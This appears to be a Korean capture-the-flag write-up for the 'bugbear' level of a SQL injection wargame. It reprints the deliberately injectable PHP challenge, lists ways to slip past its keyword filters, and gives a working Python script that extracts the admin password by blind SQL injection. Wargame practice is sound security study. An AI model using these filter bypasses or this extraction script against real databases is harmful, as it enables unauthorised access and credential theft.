Bugbear-writeup

<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~"); 
  if(preg_match('/\'/i', $_GET[pw])) exit("HeHe"); 
  if(preg_match('/\'|substr|ascii|=|or|and| |like|0x/i', $_GET[no])) exit("HeHe"); 
  $query = "select id from prob_bugbear where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_bugbear where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("bugbear"); 
  highlight_file(__FILE__); 
?>

 

필터링을 너무 많이 한다....

하나씩 bypass를 해보면

whitespace -> %0a

id='admin' -> id in (\"admin\")

=도안되고 like도 안돼서 >,<로 대체

substr -> mid 등등 

다 바꿔버린 코드를 짜자

 

 

import re
import requests
import time

flag = ''
length= 0
session =dict(PHPSESSID="fedtrqe1daeckj930s9he4f3te")
for i in range (1,20):
        for j in range(48,128):
                        r=requests.post("https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php?no=111%0a||%0aid%0ain%0a(\"admin\")%0a%26%26%0ahex(mid(pw,"+str(i)+",1))<hex("+str(j+1)+")%0a&&%0ahex(mid(pw,"+str(i)+",1))>hex("+str(j-1)+")#",cookies=session)
                        if 'Hello admin' in r.text:
                                flag=flag+str(chr(j))
                                print("finding pw: "+flag)
                                break
print("pw "+flag)